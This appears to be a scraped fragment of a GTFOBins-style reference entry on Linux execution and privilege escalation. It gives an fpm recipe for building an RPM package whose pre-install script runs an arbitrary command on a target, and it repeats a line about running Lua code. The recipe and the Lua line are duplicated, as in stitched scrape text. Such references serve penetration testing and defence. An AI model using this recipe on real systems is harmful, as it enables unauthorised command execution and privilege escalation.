command
ExecutionPrivilege Escalation Linux
Generate the RPM package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target. ``` echo /path/to/command >x.sh fpm -n x -s dir -t rpm -a all --before-install x.sh . ```
GTFO · Tool
Generate the RPM package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target. ``` echo /path/to/command >x.sh fpm -n x -s dir -t rpm -a all --before-install x.sh . ```
This allows to run Lua code (`...`).
This allows to run Lua code (`...`).
This allows to run Lua code (`...`).